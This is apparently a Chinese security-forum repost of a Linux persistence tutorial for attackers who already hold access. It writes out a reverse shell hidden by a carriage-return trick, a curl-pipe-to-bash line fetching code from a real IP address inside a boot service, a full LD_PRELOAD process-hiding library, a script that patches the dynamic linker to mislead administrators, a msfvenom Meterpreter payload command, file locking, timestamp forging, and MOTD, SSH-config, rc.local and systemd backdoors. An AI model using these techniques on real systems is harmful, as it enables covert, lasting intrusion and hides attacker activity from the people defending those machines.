安全矩阵

 找回密码
 立即注册
搜索
查看: 467|回复: 0

Linux 维权实用技巧

[复制链接]

215

主题

215

帖子

701

积分

高级会员

Rank: 4

积分
701
发表于 2023-4-8 10:54:45 | 显示全部楼层 |阅读模式
本帖最后由 alyssa 于 2023-4-8 10:54 编辑

作者:T-VUL社区
来源:https://forum.ezreal.cool/thread-100-1-1.html

小技巧
\r特性

原理:shell 在解析 \r 时会忽略掉 \r 前的信息。
cat其实默认使用是支持一些比如 \r 回车符 \n 换行符 \f 换页符、也就是这些符号导致的能够隐藏命令,使用cat -A可以看到真正的内容
比如举例隐藏反弹shell
  1. #!/bin/bash$
  2. mkdir /tmp/222;echo "bash -i >& /dev/tcp/ip/443 0>&1 &" > /tmp/222/1.sh;bash /tmp/222/1.sh;echo 'Hello world!' #^Mecho 'Hello world!'
复制代码
cat如果不加-A参数,或者不实用vim或者文本方式打开

正常运行效果


文件锁定
  1. chattr +i evil.php  #锁定文件
  2. rm -rf evil.php     #提示禁止删除

  3. lsattr  evil.php    #属性查看
  4. chattr -i evil.php  #解除锁定
  5. rm -rf evil.php     #彻底删除文件
复制代码


修改文件时间
其中-m参数是不创建一个文件,需要对已存在的文件进行修改时间,若不加-m参数会创建一个文件
  1. touch -acmr 10-help-text 20-help-text
复制代码

隐藏进程
通过预加载方式隐藏进程
**适用范围:**
    [x] Debian 5.7.6-1kali2(其他版本未测试)
    [x] Ubuntu 16.04.7 LTS(其他版本未测试)
    [x] Centos7(其他版本未测试)
    [ ] 其他暂未测试
如果有root权限可以直接修改/etc/ld.so.preload配置文件来加载我们的恶意so文件,以下是修改/etc/ld.so.preload为例子来演示

如果没有root权限可以设置当前普通用户的LD_PRELOAD环境变量来加载我们的so文件
https://github.com/gianlucaborello/libprocesshider

processhider.c
这里的process_to_filter就是要隐藏的进程,这里是以Linux上线cs的木马为例子
  1. #define _GNU_SOURCE

  2. #include <stdio.h>
  3. #include <dlfcn.h>
  4. #include <dirent.h>
  5. #include <string.h>
  6. #include <unistd.h>

  7. /*
  8. * Every process with this name will be excluded
  9. */
  10. static const char* process_to_filter = "CyqajxNwxu";

  11. /*
  12. * Get a directory name given a DIR* handle
  13. */
  14. static int get_dir_name(DIR* dirp, char* buf, size_t size)
  15. {
  16.     int fd = dirfd(dirp);
  17.     if(fd == -1) {
  18.         return 0;
  19.     }

  20.     char tmp[64];
  21.     snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
  22.     ssize_t ret = readlink(tmp, buf, size);
  23.     if(ret == -1) {
  24.         return 0;
  25.     }

  26.     buf[ret] = 0;
  27.     return 1;
  28. }

  29. /*
  30. * Get a process name given its pid
  31. */
  32. static int get_process_name(char* pid, char* buf)
  33. {
  34.     if(strspn(pid, "0123456789") != strlen(pid)) {
  35.         return 0;
  36.     }

  37.     char tmp[256];
  38.     snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);

  39.     FILE* f = fopen(tmp, "r");
  40.     if(f == NULL) {
  41.         return 0;
  42.     }

  43.     if(fgets(tmp, sizeof(tmp), f) == NULL) {
  44.         fclose(f);
  45.         return 0;
  46.     }

  47.     fclose(f);

  48.     int unused;
  49.     sscanf(tmp, "%d (%[^)]s", &unused, buf);
  50.     return 1;
  51. }

  52. #define DECLARE_READDIR(dirent, readdir)                                \
  53. static struct dirent* (*original_##readdir)(DIR*) = NULL;               \
  54. \
  55. struct dirent* readdir(DIR *dirp)                                       \
  56. {                                                                       \
  57. if(original_##readdir == NULL) {                                    \
  58. original_##readdir = dlsym(RTLD_NEXT, #readdir);               \
  59. if(original_##readdir == NULL)                                  \
  60. {                                                               \
  61. fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \
  62. }                                                               \
  63. }                                                                   \
  64. \
  65. struct dirent* dir;                                                 \
  66. \
  67. while(1)                                                            \
  68. {                                                                   \
  69. dir = original_##readdir(dirp);                                 \
  70. if(dir) {                                                       \
  71. char dir_name[256];                                         \
  72. char process_name[256];                                     \
  73. if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&        \
  74. strcmp(dir_name, "/proc") == 0 &&                       \
  75. get_process_name(dir->d_name, process_name) &&          \
  76. strcmp(process_name, process_to_filter) == 0) {         \
  77. continue;                                               \
  78. }                                                           \
  79. }                                                               \
  80. break;                                                          \
  81. }                                                                   \
  82. return dir;                                                         \
  83. }

  84. DECLARE_READDIR(dirent64, readdir64);
  85. DECLARE_READDIR(dirent, readdir);
复制代码
在未隐藏进程前效果:



编译processhider.c
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
mv libprocesshider.so /usr/local/lib/
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

但是网络状态还是能看到外连信息,但是进程ID看不到了


挂载隐藏进程

**限制:**需要root权限
**适用范围:**
    [x] Debian 5.7.6-1kali2(其他版本未测试)
    [x] Ubuntu 16.04.7 LTS(其他版本未测试)
    [x] Centos7(其他版本未测试)
    [ ] 其他暂未进行测试
这里以反弹shell为例子,可灵活使用
run.sh是反弹shell的操作,一般来说执行了反弹shell操作会有一个bash -i的进程,如下图:



可以通过挂载的方式隐藏该进程
    创建一个空目录进行挂载 /tmp/test
    通过挂载,隐藏了run.sh的进程
mount -o bind /tmp/test /proc/66893         (这里的进程ID就是上面执行反弹shell的对应ID)

可以看到之前bash -i的进程没有找到

查看网络连接状态,可以看到我们反弹shell的外连IP看不到对应的进程

恢复原状
  1. umonut -v /proc/66893
复制代码



同理利用这种方式可以隐藏其他一些进程,比如我们的木马,python执行的脚本等等,可灵活使用

拓展:
权限维持时候可以结合**cat特性**+**文件锁定**+**通过挂载的方式隐藏进程/通过预加载方式隐藏进程**+**服务启动或者计划任务等方式**组合来实现自动化小工具权限维持
库文件劫持
修改动态链接器实现恶意功能

**限制:**需要root权限
**适用范围:**
    [x] Debian 5.7.6-1kali2(其他版本未测试)
    [x] Ubuntu 16.04.7 LTS(其他版本未测试)
    [x] Centos7(其他版本未测试)
    [ ] 其他还未测试
首先了解下Linux应用程序的一个执行逻辑,以下这张图一目了然

程序的链接
    静态链接:在程序运行之前先将各个目标模块以及所需要的库函数链接成一个完整的可执行程序,之后不再拆开。如busybox
    装入时动态链接:源程序编译后所得到的一组目标模块,在装入内存时,边装入边链接。
    运行时动态链接:原程序编译后得到的目标模块,在程序执行过程中需要用到时才对它进行链接。
对于动态链接来说,需要一个动态链接库,其作用在于当动态库中的函数发生变化对于可执行程序来说时透明的,可执行程序无需重新编译,方便程序的发布/维护/更新。但是由于程序是在运行时动态加载,这就存在一个问题,假如程序动态加载的函数是恶意的,就有可能导致一些非预期的执行结果或者绕过某些安全设置。

因此有三处存在文件劫持的可能性:
    修改LD_PRELOAD环境变量来加载恶意的so文件
    直接修改/etc/ld.so.preload文件加载恶意的so文件
    修改动态链接器实现恶意功能,比如修改动态连接器默认用于预加载的配置文件的指向路径,本来的默认路径是/etc/ld.so.preload,把这个路径修改为自定义的路径,然后在里面写入要加载的恶意动态库。又比如修改默认的用于预加载的环境变量

以上三种方法中,第1、2点及其容易被发现,**这里主要讲下第三种的实现方法**
动态链接器可以被正在运行的动态链接程序或者动态对象(没有对动态链接器指定命令选项,动态链接器被存储在程序的.interp区域)间接调用,也可以直接运行程序,
例如:/lib/ld-linux.so.*  [OPTIONS] [PROGRAM [ARGUMENTS]]
很多现代应用都是通过动态编译链接的,当一个 需要动态链接 的应用被操作系统加载时,系统必须要 定位 然后 加载它所需要的所有动态库文件。
ld.so和ld-linux.so*查找并且装载其他程序所依赖的动态链接对象,当装载完毕之后,就开始运行程序

Linux二进制运行程序要求动态链接(在运行时链接)除非在汇编期间指定-static选项

动态链接器:

**/lib64/ld-linux-x86-64.so.2**是一个软链接,这里在Ubuntu 16.04.7 LTS链接到/lib/x86_64-linux-gnu/ld-2.23.so

在Linux环境下,这项工作是由ld-linux.so.2来负责完成的,我们可以通过 ldd 命令来查看一个 应用需要哪些依赖的动态库:

当最常见的ls小程序加载时,操作系统会将 控制权 交给 ld-linux.so 而不是 交给程序正常的进入地址。ld-linux.so.2 会寻找然后加载所有需要的库文件,然后再将控制权交给应用的起始入口。
上面的ls在启动时,就需要ld-linux.so加载器将所有的动态库加载后然后再将控制权移交给ls程序的入口。

这里以为Ubuntu 16.04.7 LTS例子,里面就默认写死了/etc/ld.so.preload的路径,可以通过sed命令对其进行修改


这里就有一个小技巧

参考链接:
https://everydaywithlinux.blogsp ... files-with-sed.html

通过编写脚本实现该功能:
该脚本修改动态连接器默认用于预加载的配置文件的指向路径,本来的默认路径是/etc/ld.so.preload,修改后的路径是随机路径

  1. #!/usr/bin/python2

  2. # modifies the dynamic linker and changes the target location of /etc/ld.so.preload to a random file in a random directory
  3. # this means that ld.so.preload will no longer make a difference, and it'll confuse the fuck out of sysadmins trying to remove any LD_PRELOAD malware on their box
  4. # 'new' ld.so.preload file location can still be discovered by reading the strings in the dynamic linker libraries

  5. # this python script is based off of http://everydaywithlinux.blogspot.co.uk/2012/11/patch-strings-in-binary-files-with-sed.html

  6. # this could also potentially be used to easily prevent LD_PRELOAD attacks on your own boxes :p (assuming you aren't using ld.so.preload for a legit reason already)

  7. import os
  8. import sys
  9. import random
  10. import string
  11. import subprocess

  12. LIB_DIRS = ["/lib/", "/lib/x86_64-linux-gnu/", "/lib/i386-linux-gnu/", "/lib32/", "/libx32/", "/lib64/"]
  13. P_DIRS = ["/bin/", "/sbin/", "/etc/", "/home/", "/lib/", "/libx32/", "/lib64/", "/opt/",  "/usr/", "/var/"] # doesn't really matter where the file is stored since vlany hides it anyway but nothing like a little more obscurity

  14. O_PRELOAD = "/etc/ld.so.preload"

  15. PYL = """hexdump -ve '1/1 "%.2X"' {0} | sed "s/{1}/{2}/g" | xxd -r -p > {0}.tmp
  16. chmod --reference {0} {0}.tmp
  17. mv {0}.tmp {0}"""

  18. def get_n_preload():
  19.     n_preload = "{0}.{1}"
  20.     _dir = random.choice(P_DIRS)
  21.     while not os.path.exists(_dir):
  22.         _dir = random.choice(P_DIRS)
  23.     n_preload = n_preload.format(_dir, ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(8)))
  24.     return n_preload

  25. def hex_str(_):
  26.     return _.encode("hex").upper() + "00"

  27. def patch_lib(target_lib, o_preload, n_preload):
  28.     print("Attempting to patch {0} by replacing {1} with new string, {2}".format(target_lib, o_preload, n_preload))
  29.     p = subprocess.Popen(["strings", target_lib], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  30.     out, err = p.communicate()
  31.     for x in out.split("\n"):
  32.         if x == o_preload:
  33.             print("old preload found in {0}: {1}".format(target_lib, x))

  34.             o_preload_hex = hex_str(o_preload)
  35.             n_preload_hex = hex_str(n_preload)

  36.             while(len(n_preload_hex) <> len(o_preload_hex)):
  37.                 print("Padding the new preload location with nullbytes.")
  38.                 n_preload_hex += "00"

  39.             print("Replacing {0} with {1} in library {2}".format(o_preload, n_preload, target_lib))
  40.             os.system(PYL.format(target_lib, o_preload_hex, n_preload_hex))
  41.             print("{0} patched.".format(target_lib))

  42. def get_ld_locations():
  43.     lib_locations = ""
  44.     for _ in LIB_DIRS:
  45.         if os.path.exists(_):
  46.             for x in os.listdir(_):
  47.                 if x.startswith("ld-2"):
  48.                     lib_locations += "{0}{1}\n".format(_, x)
  49.     return lib_locations

  50. if __name__ == "__main__":
  51.     locations = get_ld_locations()[:-1]
  52.     if sys.argv[1]:
  53.         if sys.argv[1] == "-c":
  54.             os.system("cp " + locations + " /tmp/backup")
  55.             print("backup: "+ locations + " to: /tmp/backup")
  56.             n_preload = get_n_preload()
  57.             for x in locations.split("\n"):
  58.                 patch_lib(x, O_PRELOAD, n_preload)
  59.             f = open("new_preload", "w")
  60.             f.write(n_preload)
  61.             f.close()
  62.         if sys.argv[1] == "-r":
  63.             print("recovery: " +locations)
  64.             os.system("mv " + "/tmp/backup" + " "+locations)
复制代码
使用方法:
python xxx.py -c
-c参数修改动态链接器的默认路径为一个随机路径,并且备份初始状态的动态链接器
python xxx.py -r
恢复初始状态的动态链接器,默认路径恢复为/etc/ld.so.preload



so文件注入

**适用范围:**
    [x] Debian
    [x] Ubuntu
    [x] Centos7
    [ ] 其他版本暂未测试

项目介绍
https://github.com/NixOS/patchelf
PatchELF is a simple utility for modifying existing ELF executables and libraries.
release直接编译好不同的版本

注入到系统命令

  1. <font _mstmutation="1">#include<stdlib.h>
  2. #include<stdio.h>
  3. #include<string.h>
  4. __attribute__ ((__constructor__)) void preload (void){
  5.     system("id");</font>
  6. }
复制代码
这里需要绝对路径,不然注入不成功
  1. gcc -shared -fPIC inject.c -o inject.so
  2. ./patchelf --add-needed /root/inject.so /bin/ls
  3. ldd /bin/ls
复制代码
删除被注入的so文件
  1. ./patchelf --remove-needed /root/inject.so /bin/ls
复制代码
效果如下:


注入到程序
一个简单的main.c程序

  1. <font _mstmutation="1">#include <stdio.h>
  2. #include <stdlib.h>
  3. #include <sys/types.h>
  4. #include <unistd.h>

  5. int main() {
  6.   printf("Just Test...\n\n");</font>
  7. }
复制代码
编译执行:
  1. gcc main.c -o main
  2. ./main
复制代码


  1. <font _mstmutation="1">#include <stdio.h>
  2. #include <stdlib.h>

  3. void __attribute__ ((constructor)) inject_init()
  4. {
  5.     printf("libinject.so init.\n");
  6. }

  7. void __attribute__ ((destructor)) inject_exit()
  8. {
  9.     printf("libinject.so exit.\n");</font>
  10. }
复制代码
  1. gcc -shared -fPIC inject.c -o inject.so
  2. patchelf --add-needed /home/zhangsan/inject.so main
复制代码


开机自启动
修改/etc/rc.d/rc.local

**限制:**需要root权限
**适用范围:**
    [x] Debian 5.7.6-1kali2
    [x] Ubuntu 16.04.7 LTS
    [x] Centos7
不通操作系统所在位置不通,后面补充


/etc/rc.d/rc.local 用于用户自定义开机启动程序,因此可以往里写开机要执行的命令或脚本。
    首先需要对该文件chmod +x /etc/rc.d/rc.local 赋予执行权限
往里面添加我们自定义的脚本/tmp/.Test-unix/run.sh


  1. chmod +x /tmp/.Test-unix/run.sh
复制代码


不过用此方式反弹的shell,查看ifconfig是看不到的

建议不要使用反弹shell,通过木马方式上线




服务自启动

chkconfig方式

**限制:**需要root权限
**适用范围:**
    [x] Debian 5.7.6-1kali2(其他版本未测试)
    [x] Ubuntu 16.04.7 LTS(其他版本未测试)
    [x] Centos7(其他版本未测试)
    [ ] 其他还未测试
服务脚本保存在:/etc/init.d 或者 /etc/rc.d/init.d


chkconfig <service> on/off,添加/删除一个自启动服务,服务脚本存在于/etc/init.d。
chkconfig --list,列出的服务均为RPM包安装的服务和通过chkconfig --add xxx设置开机启动的服务。
service <service> start/stop/restart/status,启动/停止/重启/查看。
亦可:/etc/init.d/sshd start/stop/restart/status
service --status-all,查看所有服务的状态。
ntsysv,以全屏幕文本界面设置服务开机时是否自动启动。

Linux服务器启动的时候分为6个等级:
0.表示关机
1.单用户模式
2.无网络的多用户模式
3.有网络的多用户模式
4.不可用
5.图形化界面
6.重新启动

可修改该目录下的脚本,添加恶意的脚本或者命令
  1. cat /etc/rc.d/init.d/network
复制代码



添加自定义服务方式:
1、在/etc/init.d/目录下新建一个自定义服务的文件如:myservice,chmod +x /etc/init.d/myservice
2、添加下面两句到 #!/bin/bash 之后。

  1. #!/bin/bash
  2. # chkconfig: 2345 90 90
  3. # description: myservice

  4. curl -A O -o- -L http://101.34.162.92:55414/api | bash -s
复制代码

PS:不添加这两行会报错:执行chkconfig --add myservice后提示:service myservice does not support chkconfig
PS:其中2345是默认启动级别,级别有0-6共7个级别
等级0表示:表示关机
等级1表示:单用户模式
等级2表示:无网络连接的多用户命令行模式
等级3表示:有网络连接的多用户命令行模式
等级4表示:不可用
等级5表示:带图形界面的多用户模式
等级6表示:重新启动
10是启动优先级,90是停止优先级,优先级范围是0-100,数字越大,优先级越低。

3、命令
开启开机自启动服务:chkconfig myservice on
添加开机自启动服务:chkconfig --add myservice
查看开机自启动服务:chkconfig --list myservice

删除服务
chkconfig --del myservice


systemctl方式
    [x] Debian 5.7.6-1kali2
    [x] Ubuntu 16.04.7 LTS
    [x] Centos7
    [ ] 其他还未测试
由于chkconfig是Redhat发行版特有的服务配置方式,在基于debian的发行版下原生不支持,因此使用systemctl方式添加自定义系统服务,更具优势。

由于chkconfig是Redhat发行版特有的服务配置方式,在基于debian的发行版下原生不支持,因此使用systemctl方式添加自定义系统服务,更具优势。
systemctl脚本存放在:/usr/lib/systemd/,有系统(system)和用户(user)之分,需要开机不登陆就能运行的程序,存在系统服务里,即:/usr/lib/systemd/system目录下。
systemctl管理的每一个服务以.service结尾,一般会分为3部分:[Unit]、[Service]和[Install]。
[Unit]
主要是对这个服务的说明,内容包括Description和After,Description 用于描述服务,After用于描述服务类别

[Service]
Type=simple(默认值):systemd认为该服务将立即启动。服务进程不会fork。如果该服务要启动其他服务,不要使用此类型启动,除非该服务是socket激活型。
Type=forking:systemd认为当该服务进程fork,且父进程退出后服务启动成功。对于常规的守护进程(daemon),除非你确定此启动方式无法满足需求,使用此类型启动即可。使用此启动类型应同时指定 PIDFile=,以便systemd能够跟踪服务的主进程。
Type=oneshot:这一选项适用于只执行一项任务、随后立即退出的服务。可能需要同时设置 RemainAfterExit=yes 使得 systemd 在服务进程退出之后仍然认为服务处于激活状态。
Type=notify:与 Type=simple 相同,但约定服务会在就绪后向 systemd 发送一个信号。这一通知的实现由 libsystemd-daemon.so 提供。
Type=dbus:若以此方式启动,当指定的 BusName 出现在DBus系统总线上时,systemd认为服务就绪。
Type=idle: systemd会等待所有任务(Jobs)处理完成后,才开始执行idle类型的单元。除此之外,其他行为和Type=simple 类似。
PIDFile:pid文件路径
ExecStart:指定启动单元的命令或者脚本,ExecStartPre和ExecStartPost节指定在ExecStart之前或者之后用户自定义执行的脚本。Type=oneshot允许指定多个希望顺序执行的用户自定义命令。
ExecReload:指定单元停止时执行的命令或者脚本。
ExecStop:指定单元停止时执行的命令或者脚本。
PrivateTmp:True表示给服务分配独立的临时空间
Restart:这个选项如果被允许,服务重启的时候进程会退出,会通过systemctl命令执行清除并重启的操作。
RemainAfterExit:如果设置这个选择为真,服务会被认为是在激活状态,即使所以的进程已经退出,默认的值为假,这个选项只有在Type=oneshot时需要被配置。
注意:[Service]部分的启动、重启、停止命令全部要求使用绝对路径,使用相对路径则会报错!

[Install]
服务安装的相关设置,可设置为多用户的

例子:

  1. [Unit]
  2. Description=myservice
  3. After=myservice.service

  4. [Service]
  5. Type=oneshot
  6. RemainAfterExit=yes
  7. ExecStart=/opt/myservice/start.sh
  8. ExecReload=
  9. ExecStop=/opt/myservice/stop.sh

  10. [Install]
  11. WantedBy=multi-user.target
复制代码
  1. chmod +755 /opt/myservice/start.sh
复制代码
  1. #!/bin/bash
  2. /tmp/CyqajxNwxu
复制代码

脚本授权:chmod 755 /usr/lib/systemd/system/myservice.service
开机启动:systemctl enable myservice.service
至此,每次开机都会执行/opt/myservice/start.sh,每次关机都会执行/opt/myservice/stop.sh

ubuntu有所不同启动方式


然后执行以下命令
systemctl enable /usr/lib/systemd/myservice.service
立即启动命令:systemctl start myservice.service




使用systemctl restart myservice.service命令时候会再次执行服务的脚本
  1. [Unit]
  2. Description=myservice
  3. After=myservice.service

  4. [Service]
  5. Type=oneshot
  6. RemainAfterExit=yes
  7. ExecStart=/tmp/run.sh
  8. ExecReload=
  9. ExecStop=/tmp/run.sh

  10. [Install]
  11. WantedBy=multi-user.target
复制代码
  1. #!/bin/sh
  2. nohup /home/zhangsan/test.sh &
复制代码
chkconfig与systemctl命令对照表


SSH相关

MOTD后门
**限制:**需要root权限
**适用范围:**
    [x] Debian 5.7.6-1kali2
    [x] Ubuntu 16.04.7 LTS
    [ ] centos7经测试不行
    [ ] 其他还未测试
motd,全称Message Of The Day,是Linux中发送问候消息的功能,一般在我们登录服务器后显示


每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的

motd 的动态脚本:


这里以Ubuntu 16.04.7 LTS 为例子:
motd 的动态脚本都在 /etc/update-motd.d/这个目录下


这些脚本动态的组合成了我们上面看到的那么 Banner 信息
这些文件只允许 root 用户编辑,所以使用此后门需要先获取root权限
这个目录下的所有文件在任意用户登录后都会执行一遍,因此可以通过这些脚本来留下我们的后门来权限维持
可以看到00-header打印了如下信息


就是SSH登陆成功出现的信息

因此我们可以修改默认的脚本或者新建恶意的脚本来实现权限维持
  1. msfvenom -p python/meterpreter/reverse_https lhost=xxxx lport=8443 -f raw
复制代码



SSH登陆触发





通过新建脚本的方式
  1. cp /etc/update-motd.d/10-help-text /etc/update-motd.d/20-network-dist
  2. chmod +x 20-network-dist
复制代码
然后往里面加入我们的恶意脚本
SSH





SSH Config后门

**限制:**需要root权限
**适用范围:**
    [x] Debian
    [x] Ubuntu
    [x] Centos7
    [ ] 其他还未测试
ssh客户端配置文件的加载顺序:
命令行参数 > ~/.ssh/config > /etc/ssh/ssh_config
在这个配置文件里有两个关键的参数
**LocalCommand**
在设置LocalCommand时候,当进行SSH连接成功后可以执行我们自定义的命令,设置了LocalCommand同时必须要设置PermitLocalCommand的值为yes




SSH连接其他主机成功时候触发我们自定义的命令

**ProxyCommand**
连接主机过程中设置代理所使用的命令






本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-20 19:39 , Processed in 0.014155 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表